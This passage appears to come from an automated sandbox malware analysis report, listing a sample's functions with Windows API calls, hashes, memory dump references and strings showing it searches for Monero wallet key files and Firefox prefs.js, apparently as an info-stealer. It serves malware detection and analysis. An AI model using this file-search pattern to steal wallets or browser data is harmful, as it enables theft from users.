                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 0db90db18d94ab6cfc4e6be1a4551be404306f046f6f3fdafee965cb83755ca8
                          • Instruction ID: d6c39bb443de84195a641003214bfa3102f4b67bfecd8e64031e723e0f15d8cf
                          • Opcode Fuzzy Hash: 0db90db18d94ab6cfc4e6be1a4551be404306f046f6f3fdafee965cb83755ca8
                          • Instruction Fuzzy Hash: AC5169B2540218ABC765EBB0DC89FEE777CAB59700F408588F60D96150EB759B84CF92
                          Function 00173EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00173EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00173EDA
                          • StrCmpCA.SHLWAPI(?,00180FAC), ref: 00173F08
                          • StrCmpCA.SHLWAPI(?,00180FB0), ref: 00173F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0017406C
                          • FindClose.KERNEL32(000000FF), ref: 00174081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 644ebb8e993caef985aa5a8e6ca873757f08f54c57a2327e5c3dee995efd323c
                          • Instruction ID: f3623ee565372955d34abe8796cbc4899cf67dd1931a9a08f4fce875d5084c01
                          • Opcode Fuzzy Hash: 644ebb8e993caef985aa5a8e6ca873757f08f54c57a2327e5c3dee995efd323c
                          • Instruction Fuzzy Hash: 375176B2900618ABCB65FBB0DC85EEE737CBB99304F408588B75D96040DB759B89CF91
                          Function 0016ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0016ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0016ED55
                          • StrCmpCA.SHLWAPI(?,00181538), ref: 0016EDAB
                          • StrCmpCA.SHLWAPI(?,0018153C), ref: 0016EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0016F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: e2bb02db1d619afc57717e551aaaf4a0b1705ad732ccaa8a34e5f5d7ad11ca25
                          • Instruction ID: 175e562c609fda5cbfe1eac39784de8ed7f8c3dda2a70b8506809aeaa7e2965f
                          • Opcode Fuzzy Hash: e2bb02db1d619afc57717e551aaaf4a0b1705ad732ccaa8a34e5f5d7ad11ca25
                          • Instruction Fuzzy Hash: 66E1D3729111189ADB55FB60DC52EEE737CAFA4301F8085D9B51E62092EF306F8ACF52
                          Function 0016F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001815B8,00180D96), ref: 0016F71E
                          • StrCmpCA.SHLWAPI(?,001815BC), ref: 0016F76F
                          • StrCmpCA.SHLWAPI(?,001815C0), ref: 0016F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0016FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 22f4de46d8d77f017bf97d57328de5a59686747c92fbfb0ec52876e8156381d8
                          • Instruction ID: ec841dd489540a8a2a8327ff99604ca02d017b0d3419991d34326a13423e7bd4
                          • Opcode Fuzzy Hash: 22f4de46d8d77f017bf97d57328de5a59686747c92fbfb0ec52876e8156381d8
                          • Instruction Fuzzy Hash: 1CB144719001189BCB24FF74DC56EEE7379AFA4301F8085A8A50E97191EF315B5ACF92
                          Function 001616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0018510C,?,?,?,001851B4,?,?,00000000,?,00000000), ref: 00161923
                          • StrCmpCA.SHLWAPI(?,0018525C), ref: 00161973
                          • StrCmpCA.SHLWAPI(?,00185304), ref: 00161989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00161D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00161DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00161E20
                          • FindClose.KERNEL32(000000FF), ref: 00161E32
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 433ecc31cdce9f775a807e37145c73ee6c67507c12364d3edbb6817175972289
                          • Instruction ID: fce7e0017bc256f99a84d02b9e258d6b3e1dec4b0c45a3b640b9cb8d0c9685e7
                          • Opcode Fuzzy Hash: 433ecc31cdce9f775a807e37145c73ee6c67507c12364d3edbb6817175972289
                          • Instruction Fuzzy Hash: EE1207719501189BDB59FB60CC96EEE737CAFA4301F808599B51E62091EF306F89CF92
                          Function 0016DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00180C2E), ref: 0016DE5E
                          • StrCmpCA.SHLWAPI(?,001814C8), ref: 0016DEAE
                          • StrCmpCA.SHLWAPI(?,001814CC), ref: 0016DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0016E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 566fd9354f0865877c194d83c63f67fd6a12dbb3f9ce8f932844ff07da1b973f
                          • Instruction ID: df04f7dcf0dd38588199fe638343c97c21c4fc82d21cbbe6c65825f36f5091df
                          • Opcode Fuzzy Hash: 566fd9354f0865877c194d83c63f67fd6a12dbb3f9ce8f932844ff07da1b973f
                          • Instruction Fuzzy Hash: CFF17D719541189ADB19FB60DC95EEE7378BFA4301FC081D9A51E62091EF306F8ACF62
                          Function 0016DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001814B0,00180C2A), ref: 0016DAEB
                          • StrCmpCA.SHLWAPI(?,001814B4), ref: 0016DB33
                          • StrCmpCA.SHLWAPI(?,001814B8), ref: 0016DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0016DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 32d6dd2b75f913e1469a6dc7135cbc76fe1e316ec58a7310a9e870c5f53bff4e
                          • Instruction ID: 59f90dbeb0e2030edafb965be52d98d078038a3301e20b53eaacd69d3d69b84d
                          • Opcode Fuzzy Hash: 32d6dd2b75f913e1469a6dc7135cbc76fe1e316ec58a7310a9e870c5f53bff4e
                          • Instruction Fuzzy Hash: 97913372A00104ABCB15FBB4EC569EE737DAFE5301F80C558B91A96181EF349B19CB93
                          Function 00530E13 Relevance: 12.9, Strings: 9, Instructions: 1667COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %x~o$1J/$5J/$JCj[$W?5$W?5$t\_$/}$n}^
                          • API String ID: 0-2749340528
                          • Opcode ID: d2326108b9af6df26ec6643e2c8cc2335dd66ea178aebba894c9d939da442a92
                          • Instruction ID: 1ee6d0300d1ef64cd83ccb7928e30e6b030910e9997eb529366bacd1765d4b03
                          • Opcode Fuzzy Hash: d2326108b9af6df26ec6643e2c8cc2335dd66ea178aebba894c9d939da442a92
                          • Instruction Fuzzy Hash: B6B21BF360C6009FE308AE2DDC8567AB7E9EF94720F1A863DEAC5C7744E93558018697
                          Function 00521D96 Relevance: 11.6, Strings: 8, Instructions: 1639COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'j[$0~ |$9IE$AQ$DOXK$a%@s$u?~$ub}
                          • API String ID: 0-250917369
                          • Opcode ID: cc922f6930b7667376268f790abdd0794b4aa7b61ac6c1a8105e81eb6e2ba3b8
                          • Instruction ID: 8e6c4b7e374ade9111118e2b43d5a544f625809215d83e3f413e07585452d29a
                          • Opcode Fuzzy Hash: cc922f6930b7667376268f790abdd0794b4aa7b61ac6c1a8105e81eb6e2ba3b8
                          • Instruction Fuzzy Hash: F1B229F390C204AFE3146E2DEC8567ABBE9EF94720F1A493DEAC4C3744E63558058697
                          Function 0052532C Relevance: 11.6, Strings: 8, Instructions: 1625COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !pC\$<:Sk$[37$ebw[$le]$+kO$8^t$7
                          • API String ID: 0-1760684657
                          • Opcode ID: 70de5e199ad2c3789d753eeb36a7e32cc84eeab87662eed9e8a1990a85ab1c5b
                          • Instruction ID: 24237312aa7cc146f420aca5424fa28820601e3a10d806fb2d100b5811133de5
                          • Opcode Fuzzy Hash: 70de5e199ad2c3789d753eeb36a7e32cc84eeab87662eed9e8a1990a85ab1c5b
                          • Instruction Fuzzy Hash: 1EB207F36086049FE304AE2DEC8567AFBE5EF94320F164A3DEAC4C3744E63599058697
                          Function 00526E28 Relevance: 11.6, Strings: 8, Instructions: 1617COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
